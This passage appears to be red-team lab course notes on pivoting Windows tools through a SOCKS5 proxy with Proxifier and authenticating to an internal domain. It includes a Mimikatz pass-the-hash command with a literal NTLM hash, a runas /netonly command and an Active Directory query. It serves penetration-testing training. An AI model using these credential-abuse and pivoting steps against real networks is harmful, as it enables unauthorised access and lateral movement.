Windows Tools

To tunnel traffic from our Windows machine we will use Proxifier (https://www.proxifier.com/).

To create a new proxy entry, go to Profile > Proxy Servers. Click Add and enter the relevant details.

When asked if you want to use this proxy by default, select No. But select Yes when prompted to go to the Proxification Rules. Here, we tell Proxifier which applications to proxy and under what conditions.

Click Add to create a new rule and use the following:

• Name: Tools

• Applications: Any

• Target hosts: 10.10.120.0/24;10.10.122.0/24

• Target ports: Any

• Action: Proxy SOCKS5 10.10.5.50

To enable authentication to occur over the proxy, an application needs to be launched as a user from the target domain. This can be achieved using runas /netonly or Mimikatz.

PS C:\Users\Attacker> runas /netonly /user:DEV\bfarmer mmc.exe

To achieve the same with Mimikatz:

mimikatz # privilege::debug

mimikatz # sekurlsa::pth /domain:DEV /user:bfarmer /ntlm:4ea24377a53e67e78b2bd853974420fc /run:mmc.exe

PowerShell cmdlets that support credential objects can also be used.

PS C:\Users\Attacker> $cred = Get-Credential

PS C:\Users\Attacker> Get-ADComputer -Server 10.10.122.10 -Filter * -Credential $cred | select DNSHostName